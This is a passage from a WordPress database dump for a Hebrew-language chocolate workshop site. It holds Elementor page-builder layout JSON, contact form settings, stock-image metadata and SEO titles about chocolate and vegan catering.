invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1231,245,'_elementor_version','0.4'),(1232,245,'_elementor_template_type','post'),(1244,247,'_edit_last','1'),(1245,247,'_edit_lock','1539843320:1'),(1246,248,'_wp_attached_file','2018/10/cake-pops-693645_640.jpg'),(1247,248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:480;s:4:\"file\";s:32:\"2018/10/cake-pops-693645_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"cake-pops-693645_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"cake-pops-693645_640-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:32:\"cake-pops-693645_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1248,248,'_wp_attachment_image_alt','סדנאות שוקולד'),(1249,247,'_thumbnail_id','248'),(1250,247,'_wp_page_template','default'),(1253,247,'_yoast_wpseo_title','כל מה שרציתם לדעת על קקאו ולא העזתם לשאול - שוקולד4U'),(1254,247,'_yoast_wpseo_metadesc','מי מאיתנו לא אוהב שוקולד? אם יש משהו שמיד מחזיר כל אחד ואחד מאיתנו לילדות וישר עוטף אותנו בסוג של טעם מתוק ומנחם זה השוקולד- כנסו לגלות משהו חדש'),(1255,247,'_yoast_wpseo_primary_category','7'),(1256,250,'_edit_last','1'),(1257,250,'_edit_lock','1539952232:1'),(1258,251,'_wp_attached_file','2018/10/fruit-basket-1114060_640.jpg'),(1259,251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:423;s:4:\"file\";s:36:\"2018/10/fruit-basket-1114060_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"fruit-basket-1114060_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"fruit-basket-1114060_640-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:36:\"fruit-basket-1114060_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1260,251,'_wp_attachment_image_alt','שוקולד עם פירות'),(1261,250,'_thumbnail_id','251'),(1262,250,'_wp_page_template','default'),(1265,250,'_yoast_wpseo_primary_category','7'),(1266,254,'_edit_last','1'),(1267,254,'_edit_lock','1540297869:1'),(1268,255,'_wp_attached_file','2018/10/coffee-cup-2317201_640.jpg'),(1269,255,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:34:\"2018/10/coffee-cup-2317201_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"coffee-cup-2317201_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"coffee-cup-2317201_640-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:34:\"coffee-cup-2317201_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1270,254,'_thumbnail_id','255'),(1271,254,'_wp_page_template','default'),(1274,254,'_yoast_wpseo_primary_category','7'),(1277,258,'_edit_last','1'),(1278,258,'_edit_lock','1540299868:1'),(1279,259,'_wp_attached_file','2018/10/chocolate-811794_640.jpg'),(1280,259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:32:\"2018/10/chocolate-811794_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"chocolate-811794_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"chocolate-811794_640-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:32:\"chocolate-811794_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1281,259,'_wp_attachment_image_alt','שוקולד טבעוני'),(1282,258,'_thumbnail_id','259'),(1283,258,'_wp_page_template','default'),(1286,258,'_yoast_wpseo_primary_category','7'),(1289,258,'_yoast_wpseo_title','טבעונים ונהנים- מנות טבעוניות מנצחות לקייטרינג - שוקולד4U'),(1290,258,'_yoast_wpseo_metadesc','הקייטרינג הטבעוני מהווה הזדמנות להפגיש את האורחים שלכם עם מאכלים חדשים בשילובים מפתיעים. אילו מנות טבעוניות מנצחות מוצעות במסגרת קייטרינג לאירועים?'),(1291,261,'_wp_page_template','elementor_header_footer'),(1292,261,'_elementor_edit_mode','builder'),(1293,261,'_elementor_template_type','post'),(1294,261,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 